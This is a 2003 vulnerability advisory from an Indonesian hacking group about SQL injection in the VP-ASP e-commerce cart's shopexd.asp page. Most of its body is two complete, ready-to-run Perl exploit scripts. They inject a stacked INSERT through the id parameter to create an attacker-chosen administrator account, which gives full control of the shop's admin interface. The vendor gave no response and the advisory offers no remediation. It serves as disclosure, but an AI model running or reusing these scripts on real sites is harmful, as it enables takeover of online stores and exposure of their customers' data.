$Id: aresu-adv.6,v1 04/07/2003 aresu Exp $

1ndonesian Security Team (1st)
AresU Advisory #6 VPASP SQL Injection
04/07/2003




VPASP SQL Injection Vulnerability & Exploit CODE
_______________________________________________________________________________


Advisory Name: VPASP SQL Injection Vulnerability
Release Date: 05/07/2003
Application: 5
Platform: Win32/MSSQL
Severity: High
BUG Type: SQL Injection
Discover by: AresU <aresu@bosen.net> & TioEuy <tioeuy@bosen.net>
Author: Bosen <mobile@bosen.net>
Vendor Status: See below.
Vendor URL: http://www.vpasp.com/
Reference: http://bosen.net/releases/

Overview:
VP-ASP is  now in use in over 70 countries and has every major feature
you would expect from an e-commerce solution. VP-ASP combines  ease of use  and powerful features with unlimited customization.
more nice reading at http://www.vpasp.com itself.

Details:
Looking at vpasp source code, we found nice SQL Injection vuln. which is lies on shopexd.asp. Exploiting is not hard to do. Insert new user with admin priviledge can be done in a sec. Which is would couse full control to web based admin interface.

Exploits/POC:
by Bosen
--------
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
==============================
tio-fux.pl, vpasp SQL Injection Proof of Concept
Exploit by  : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to   : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
muthafuka all #hackers\@centrin.net.id/austnet.org
http://bosen.net/releases/
"; # shut up ! we're the best in our country :)

use LWP::UserAgent;  # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>
\n\n";
  exit;
}
my $biji    =
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
$tio     = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio    .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio    .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) {
   printf " %s\n", $dodol->status_line;
} else {
   print "Tuing !\n";
}
print "\n680165\n";
--END--

by Aresu
--------
#!/usr/bin/perl
# PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
# hackers@centrin.net.id/austnet.org, #romance@centrin.net.id
# http://bosen.net/releases/
use Socket;

$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
$aksesnya
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
$pieldnya = '"fldusername","fldpassword","fldaccess"';

if ($#ARGV<4)
{
  print "\n$dodolbasik";
  print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user>
<password> \n\n";
  exit;
}
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
($pieldnya)
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /%20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;

$port=80;
$host=$ARGV[0];
$target = inet_aton($host);
@hasil=sendraw($kupret);
print $gembel;
print @hasil;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
               
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
}
--END--

Vendor Response:
Contacted. No response.

Recommendation:
No recommendation for this.

1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/

About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.

1st provides security information and patches for use by the entire 1st
community.

This information is provided freely to all interested parties and may be
redistributed provided that it is not altered in any way, 1st is appropriately
credited and the document retains.

Greetz to:
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n
All 1ndonesian Security Team - #hackers@austnet.org/centrin.net.id

****************************************************************************
this advisory is for educational purpose only, the author is not 
responsible for anything happened with the use of this script *cupz*
****************************************************************************



AresU <aresu@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=41